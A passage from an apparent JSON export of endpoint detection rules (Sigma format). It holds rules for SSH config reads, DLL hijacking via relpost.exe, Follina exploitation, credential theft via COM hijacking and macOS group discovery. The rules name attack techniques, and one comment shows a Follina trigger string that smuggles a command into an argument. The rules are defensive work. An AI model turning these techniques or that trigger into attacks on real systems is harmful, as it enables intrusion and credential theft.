--clean'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n exclusion_eset:\n ProcessImage|startswith: '/opt/eset/'\n\n exclusion_puppet:\n - ProcessImage|startswith: '/opt/puppetlabs/'\n - ProcessCommandLine|contains: '/usr/bin/puppet agent'\n\n exclusion_fusioninventory:\n - ProcessName|startswith: 'fusioninventory-agent'\n - ProcessCommandLine|contains: 'fusioninventory-agent'\n\n exclusion_sosreport:\n ProcessCommandLine|startswith:\n - '/usr/bin/python* /usr/*bin/sosreport'\n - '/usr/libexec/platform-python* /usr/sbin/sosreport '\n\n exclusion_aide:\n ProcessImage|endswith: '/aide'\n\n exclusion_insights_client:\n - ProcessParentCommandLine|contains:\n - '/site-packages/insights_client/run.py'\n - '/bin/insights-client-run'\n - '/bin/redhat-access-insights'\n - ProcessGrandparentCommandLine|contains:\n - '/site-packages/insights_client/run.py'\n - '/bin/insights-client-run'\n - 
'/bin/redhat-access-insights'\n\n exclusion_dpkg_openssh:\n ProcessParentCommandLine|contains:\n - 'sh /var/lib/dpkg/info/openssh-server.config configure'\n - 'sh /tmp/openssh-server.config.?????? configure'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_glpi_agent:\n - ProcessImage: '/opt/glpi-agent/perl/*/bin/perl'\n - ProcessParentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - 'glpi-agent: running *'\n - ProcessGrandparentCommandLine:\n - 'glpi-agent: waiting'\n - 'glpi-agent (tag *): *'\n - 'glpi-agent: running *'\n - ProcessCommandLine|contains:\n - '/usr/bin/perl /usr/bin/glpi-agent'\n - '/usr/bin/perl /usr/bin/glpi-inventory'\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_qualys2:\n # grep -Ei ^[[:blank:]]*UsePrivilegeSeparation[[:blank:]]*[[:blank:]] /etc/ssh/sshd_config\n # grep -Ei ^[[:blank:]]*UsePAM[[:blank:]]*[[:blank:]] /etc/ssh/sshd_config\n # grep -Ei ^[[:blank:]]*Subsystem[[:blank:]]*[[:blank:]] /etc/ssh/sshd_config\n # ...\n ProcessCommandLine:\n - 'grep -Ei ^[[:blank:]]\\**[[:blank:]]\\*[[:blank:]] /etc/ssh/sshd_config'\n - 'grep X11Forwarding yes /etc/ssh/sshd_config'\n ProcessParentImage:\n - '/usr/bin/bash'\n - '/usr/bin/dash'\n ProcessGrandparentImage:\n - '/usr/bin/bash'\n - '/usr/bin/dash'\n\n exclusion_mcafee:\n ProcessImage: '/opt/McAfee/ens/tp/bin/mfetpd'\n\n exclusion_bladelogic:\n ProcessGrandparentImage: '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n\n exclusion_udscan:\n ProcessImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n\n exclusion_gitlab:\n - ProcessParentCommandLine|contains: '/opt/gitlab/embedded/bin/ruby /opt/gitlab/embedded/bin'\n - ProcessGrandparentCommandLine: '/bin/bash /opt/gitlab/bin/gitlab-ctl reconfigure'\n - ProcessGrandparentImage|startswith: '/opt/gitlab/embedded/bin/'\n\n exclusion_idataagent:\n ProcessImage:\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n\n exclusion_zabbix:\n ProcessImage: '/usr/sbin/zabbix_agent?'\n\n exclusion_deepinstinct:\n ProcessImage: '/opt/deepinstinct/bin/DeepManagementService'\n\n exclusion_wazuh:\n 
ProcessImage|endswith:\n - '/ossec/bin/wazuh-syscheckd'\n - '/ossec/bin/wazuh-modulesd'\n\n exclusion_newrelic:\n ProcessImage: '/usr/bin/newrelic-infra'\n\n exclusion_rudder:\n ProcessImage: '/opt/rudder/bin/cf-agent'\n\n exclusion_oscap:\n ProcessImage: '/usr/bin/oscap'\n ProcessCommandLine|startswith: 'oscap xccdf eval --profile '\n\n exclusion_packagekit:\n ProcessImage: '/usr/libexec/packagekitd'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_monit:\n ProcessImage: '/usr/bin/monit'\n\n exclusion_rkhunter:\n - ProcessParentCommandLine|contains: '/usr/bin/rkhunter '\n - ProcessGrandparentCommandLine|contains: '/usr/bin/rkhunter '\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_gc_worker:\n ProcessImage: '/opt/gc_service/gc/gc_worker'\n\n exclusion_microsoft_wdavdaemon:\n ProcessImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n\n exclusion_tanium:\n ProcessCommandLine|startswith:\n - '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n - '/opt/tanium/taniumclient/taniumclient '\n - '/opt/Tanium/TaniumClient/TaniumCX '\n\n exclusion_clamscan:\n ProcessImage: '/usr/bin/clamscan'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_socket_gen:\n ProcessImage: '/usr/lib/systemd/system-generators/sshd-socket-generator'\n\n exclusion_webmin:\n ProcessCommandLine|startswith: '/usr/bin/perl /usr/share/webmin/miniserv.pl'\n\n exclusion_docker:\n - 
ProcessImage: '/usr/bin/dockerd'\n - ProcessGrandparentImage: '/usr/bin/dockerd'\n\n exclusion_ds_agent:\n ProcessImage:\n - '/opt/ds_agent/ds_am'\n - '/opt/ds_agent/ds_agent'\n\n exclusion_palo:\n ProcessGrandparentImage: '/opt/traps/bin/pmd'\n\n exclusion_kalilab:\n ProcessCommandLine|contains: '/var/www/kalilab/'\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_augtool:\n ProcessImage: '/usr/bin/augtool'\n\n exclusion_convert2rhel:\n ProcessCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_cloudinit:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? /usr/bin/cloud-init '\n - '/usr/libexec/platform-python /usr/bin/cloud-init '\n\n exclusion_cyberwatch:\n ProcessCommandLine:\n - 'awk {IGNORECASE=1; if ($1~/^\\s*include$/) print $2} /etc/ssh/sshd_config'\n - 'awk {IGNORECASE=1; if ($1~/^\\s*match$/) print $0} /etc/ssh/sshd_config'\n\n exclusion_tripwire:\n ProcessCommandLine: '/usr/sbin/tripwire'\n\n exclusion_leapp:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? /bin/leapp '\n - '/usr/libexec/platform-python /bin/leapp '\n\n exclusion_coin:\n ProcessCommandLine|startswith: '/usr/bin/python /usr/local/bin/coin '\n\n exclusion_facter:\n ProcessCommandLine|contains: '/usr/bin/ruby /usr/bin/facter'\n\n exclusion_networker:\n ProcessParentImage: '/usr/sbin/nsrexecd'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "be199090-c1ac-4cbd-8c95-56a4e745b516",
"rule_name": "SSH Server Configuration Read",
"rule_description": "Detects an attempt to read the content of the SSH server configuration file.\nThe SSH server configuration contains the security settings used by SSH.\nAn attacker can read the SSH server configuration to find weaknesses in it.\nIt is recommended to investigate the process reading the configuration file.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1484",
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "be284800-d1c8-4c56-a95c-c935a9a84f71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597214Z",
"creation_date": "2026-03-23T11:45:34.597217Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597229Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_relpost.yml",
"content": "title: DLL Hijacking via relpost.exe\nid: be284800-d1c8-4c56-a95c-c935a9a84f71\ndescription: |\n Detects potential Windows DLL Hijacking via relpost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'relpost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\ReAgent.dll'\n - '\\wer.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "be284800-d1c8-4c56-a95c-c935a9a84f71",
"rule_name": "DLL Hijacking via relpost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via relpost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "be303eba-4ffb-48f8-98da-8df78e6af4b7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093556Z",
"creation_date": "2026-03-23T11:45:34.093558Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093562Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
"https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1566/"
],
"name": "t1104_office_application_spawning_msdt.yml",
"content": "title: Possible Follina CVE-2022-30190 Vulnerability Exploitation\nid: be303eba-4ffb-48f8-98da-8df78e6af4b7\ndescription: |\n Detects the possible exploitation of CVE-2022-30190 (aka Follina), a Microsoft Office code execution vulnerability that uses ms-msdt scheme to execute malicious code.\n Attackers can use Follina to execute code as part of their initial compromise by luring users into clicking on infected Office documents.\n It is recommended to analyze the opened Office document as well as to investigate processes stemming from the vulnerability exploitation.\nreferences:\n - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e\n - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1566/\ndate: 2022/05/30\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - attack.initial_access\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.Follina\n - classification.Windows.Exploit.CVE-2022-30190\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\msdt.exe'\n - OriginalFileName: 'msdt.exe'\n selection_cmdline:\n CommandLine|contains|all:\n - 'IT_BrowseForFile'\n - '..?..?'\n selection_answerfile:\n CommandLine|contains:\n - ' /af '\n - ' -af '\n\n exclusion_networking:\n CommandLine|contains:\n - '-skip TRUE -path ?:\\windows\\diagnostics\\system\\networking -af ?:\\'\n - '-skip TRUE -path ??:\\windows\\diagnostics\\system\\networking? 
-af ??:\\'\n - ' -path ?:\\windows\\diagnostics\\system\\networking -skip force -af ?:\\'\n # C:\\WINDOWS\\system32\\msdt.exe -path C:\\WINDOWS\\diagnostics\\system\\networking -elev {E87F85D5-7427-4DF5-B36B-0317DA553142} -skip force -af C:\\Users\\xxxx\\AppData\\Local\\Temp\\NDF860E.tmp -ep NetworkDiagnosticsSharing -elevated yes\n # C:\\WINDOWS\\SysWOW64\\msdt.exe -path C:\\WINDOWS\\diagnostics\\system\\networking -elev {8FE9353F-43C4-40E3-9C56-299E82D1BF49} -skip force -af C:\\Users\\xxxx\\AppData\\Local\\Temp\\NDFF5EF.tmp -modal 0007081A -ep NetworkDiagnosticsWeb -elevated yes\n # C:\\WINDOWS\\system32\\msdt.exe -path C:\\WINDOWS\\diagnostics\\system\\networking -elev {D2E49F22-A2A9-4473-94F4-00427DB6A44E} -skip force -af C:\\Users\\xxxx\\AppData\\Local\\Temp\\NDF6BDC.tmp -ep NetworkDiagnosticsGenericNetConnection -elevated yes\n - 'msdt.exe -path ?:\\WINDOWS\\diagnostics\\system\\networking -elev {????????-????-????-????-????????????} -skip force -af ?:\\Users\\'\n\n # We can trigger this vulnerability using pcwrun.exe (pcwrun /../../$(calc).exe) that spawn msdt.exe (C:\\windows\\System32\\msdt.exe -path C:\\windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\PCW3C69.xml /skip TRUE).\n # So, we exclude legitimate usage of pcwrun.exe that spawn msdt.exe.\n exclusion_PCWDiagnostic:\n # C:\\windows\\System32\\msdt.exe -path C:\\windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\PCWC9F3.xml /skip TRUE\n # C:\\windows\\System32\\msdt.exe -path C:\\windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\PCW9D5A.xml /skip TRUE\n CommandLine|startswith: '?:\\windows\\System32\\msdt.exe -path ?:\\windows\\diagnostics\\index\\PCWDiagnostic.xml -af ?:\\'\n # C:\\windows\\system32\\pcwrun.exe C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\n # C:\\windows\\system32\\pcwrun.exe C:\\Program Files\\LibreOffice\\program\\soffice.exe ContextMenu\n 
ParentCommandLine:\n - '?:\\windows\\system32\\pcwrun.exe *'\n - '?:\\windows\\system32\\pcwrun.exe'\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "be303eba-4ffb-48f8-98da-8df78e6af4b7",
"rule_name": "Possible Follina CVE-2022-30190 Vulnerability Exploitation",
"rule_description": "Detects the possible exploitation of CVE-2022-30190 (aka Follina), a Microsoft Office code execution vulnerability that uses the ms-msdt scheme to execute malicious code.\nAttackers can use Follina to execute code as part of their initial compromise by luring users into clicking on infected Office documents.\nIt is recommended to analyze the opened Office document as well as to investigate processes stemming from the vulnerability exploitation.\n",
"rule_creation_date": "2022-05-30",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "be692d57-801a-4187-81bc-0cb99ce4afbc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074916Z",
"creation_date": "2026-03-23T11:45:34.074918Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074923Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.slowerzs.net/posts/thievingfox/",
"https://github.com/Slowerzs/ThievingFox/",
"https://attack.mitre.org/techniques/T1056/004/"
],
"name": "t1056_004_thievingfox_com_hijack.yml",
"content": "title: Possible Credential Theft via COM Hijack\nid: be692d57-801a-4187-81bc-0cb99ce4afbc\ndescription: |\n Detects the modification of COM-related registry keys that can be used to gather credentials.\n Attackers may exploit COMs to hijack execution flow and load arbitrary libraries in new processes as a means to steal credentials.\n It is recommended to check whether the modification is expected and to analyze the library pointed to by the modified registry key.\nreferences:\n - https://blog.slowerzs.net/posts/thievingfox/\n - https://github.com/Slowerzs/ThievingFox/\n - https://attack.mitre.org/techniques/T1056/004/\ndate: 2024/02/13\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1056.004\n - attack.persistence\n - attack.t1546.015\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_write:\n EventType: 'SetValue'\n\n selection_key_consent_1:\n TargetObject|endswith: '\\CLSID\\{745A5ADD-6A71-47B9-9BB9-31DD3A6913D4}\\InprocServer32\\(Default)'\n selection_expected_consent_1:\n Details: '%SystemRoot%\\System32\\authui.dll'\n\n selection_key_consent_2:\n TargetObject|endswith: '\\CLSID\\{96B42929-01F1-468C-B521-6294AB438F4A}\\InprocServer32\\(Default)'\n selection_expected_consent_2:\n Details: '%SystemRoot%\\System32\\windows.ui.creddialogcontroller.dll'\n\n selection_key_logonui_1:\n TargetObject|endswith: '\\CLSID\\{2135F72A-90B5-4ED3-A7F1-8BB705AC276A}\\InprocServer32\\(Default)'\n selection_expected_logonui_1:\n Details:\n - '%SystemRoot%\\System32\\authui.dll'\n - '%SystemRoot%\\system32\\credprovslegacy.dll'\n - 'acnampwdcredprovider.dll'\n\n selection_key_logonui_2:\n TargetObject|endswith: '\\CLSID\\{0BDC6FC7-83E3-46A4-BFA0-1BC14DBF8B38}\\InprocServer32\\(Default)'\n selection_expected_logonui_2:\n Details: 
'%SystemRoot%\\System32\\logoncontroller.dll'\n\n selection_key_msmpeg2vdec:\n TargetObject|endswith: '\\CLSID\\{62CE7E72-4C71-4D20-B15D-452831A87D9D}\\InprocServer32\\(Default)'\n selection_expected_msmpeg2vdec:\n Details:\n - '%SystemRoot%\\System32\\msmpeg2vdec.dll'\n - '?:\\Windows\\SysWOW64\\msmpeg2vdec.dll'\n - '?:\\Windows\\system32\\msmpeg2vdec.dll'\n\n selection_key_mstscax:\n TargetObject|endswith:\n - '\\CLSID\\{8B918B82-7985-4C24-89DF-C33AD2BBFBCD}\\InprocServer32\\(Default)'\n - '\\CLSID\\{4EB89FF4-7F78-4A0F-8B8D-2BF02E94E4B2}\\InprocServer32\\(Default)'\n - '\\CLSID\\{A1230401-67a5-4df6-a730-dce8822c80c4}\\InprocServer32\\(Default)'\n selection_expected_mstscax:\n Details:\n - '%systemroot%\\system32\\mstscax.dll'\n - '?:\\Windows\\System32\\mstscax.dll'\n\n condition: selection_write and (\n (selection_key_consent_1 and not selection_expected_consent_1)\n or (selection_key_consent_2 and not selection_expected_consent_2)\n or (selection_key_logonui_1 and not selection_expected_logonui_1)\n or (selection_key_logonui_2 and not selection_expected_logonui_2)\n or (selection_key_mstscax and not selection_expected_mstscax)\n or (selection_key_msmpeg2vdec and not selection_expected_msmpeg2vdec)\n )\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "be692d57-801a-4187-81bc-0cb99ce4afbc",
"rule_name": "Possible Credential Theft via COM Hijack",
"rule_description": "Detects the modification of COM-related registry keys that can be used to gather credentials.\nAttackers may exploit COMs to hijack execution flow and load arbitrary libraries in new processes as a means to steal credentials.\nIt is recommended to check whether the modification is expected and to analyze the library pointed to by the modified registry key.\n",
"rule_creation_date": "2024-02-13",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1056.004",
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "beb6c599-6b26-415f-bd79-23d6a4c87642",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095069Z",
"creation_date": "2026-03-23T11:45:34.095071Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095075Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/002/",
"https://attack.mitre.org/techniques/T1087/002/"
],
"name": "t1069_002_dscacheutil_discovery_groups_macos.yml",
"content": "title: Groups Listed via dscacheutil\nid: beb6c599-6b26-415f-bd79-23d6a4c87642\ndescription: |\n Detects the execution of the dscacheutil command to query information about groups.\n Adversaries can use this information for lateral movement or privilege escalation.\n It is recommended to check for malicious behavior by the process launching dscacheutil and correlate this alert with any other discovery activity.\nreferences:\n - https://attack.mitre.org/techniques/T1069/002/\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2024/06/13\nmodified: 2025/07/01\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.002\n - attack.t1087.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscacheutil\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: 'dscacheutil'\n CommandLine|contains: '-q group'\n\n exclusion_pkinstallsandbox:\n GrandparentCommandLine: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/com.microsoft.wdav.??????/preinstall /Library/Caches/com.microsoft.autoupdate.helper/wdav-upgrade.pkg /Applications / /'\n\n exclusion_kaspersky:\n ParentImage: '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n\n exclusion_mdatp:\n CommandLine: '/usr/bin/dscacheutil -q group -a name _mdatp'\n ParentCommandLine|contains: '/postinstall /Library/Caches/com.microsoft.autoupdate.helper/wdav-upgrade.pkg'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "beb6c599-6b26-415f-bd79-23d6a4c87642",
"rule_name": "Groups Listed via dscacheutil",
"rule_description": "Detects the execution of the dscacheutil command to query information about groups.\nAdversaries can use this information for lateral movement or privilege escalation.\nIt is recommended to check for malicious behavior by the process launching dscacheutil and correlate this alert with any other discovery activity.\n",
"rule_creation_date": "2024-06-13",
"rule_modified_date": "2025-07-01",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.002",
"attack.t1087.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bef1e86b-dd5e-45e3-b788-14d8427f649c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
